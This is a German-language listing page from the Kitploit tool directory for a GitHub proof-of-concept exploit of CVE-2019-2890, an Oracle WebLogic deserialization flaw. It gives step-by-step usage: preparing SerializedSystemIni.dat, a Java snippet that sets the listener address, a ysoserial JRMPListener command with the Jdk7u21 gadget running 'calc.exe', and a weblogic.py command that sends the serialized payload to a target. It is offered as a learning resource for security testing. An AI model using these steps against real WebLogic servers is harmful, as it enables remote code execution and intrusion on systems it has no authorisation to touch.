Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2019-2890 — 0-sec.org | Kitploit
Tools/GitHubGitHub/ianxtianxt/cve-2019-2890
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationCommand and ControlRemote-Access-Tool
GitHubianxtianxt/cve-2019-2890

CVE-2019-2890

0-sec.org

Repository anzeigen
42vor 6 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Erklärung

Nur für Lern- und Austauschzwecke. Für andere Verwendungen übernimmt der Benutzer die volle Verantwortung.

Beschreibung

Die relevanten JAR-Dateien wurden bereits in das Projekt importiert, und die Ausnutzungsmethode verwendet yso's JRMP. Beim Lern- und Debuggingprozess kann die Ausnutzungsmethode geändert werden.

Zuerst muss die Datei SerializedSystemIni.dat aus dem WebLogic-Verzeichnis in den security-Ordner gelegt werden.

Dann muss yso in ysoserial.jar umbenannt und in das lib-Verzeichnis importiert werden.

1

Als nächstes müssen die IP-Adresse und der Port in getObject aus weblogic/wsee/jaxws/persistence/PersistentContext.java eingetragen werden.

root@kitploit:~
        try {
            var3.writeObject(Poc.getObject("127.0.0.1:8000"));
        } catch (Exception e) {
            e.printStackTrace();
        }

Schließlich wird die Ausführung des 7u21-Befehls über JRMP-Fernüberwachung durchgeführt.

root@kitploit:~
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 8000 Jdk7u21 "calc.exe"

Verwendungsmethode: Führen Sie Poc.java aus, um die Serialisierungsdatei poc.ser zu generieren. Verwenden Sie dann:

root@kitploit:~
python weblogic.py ip port poc.ser

1

1

Tool herunterladen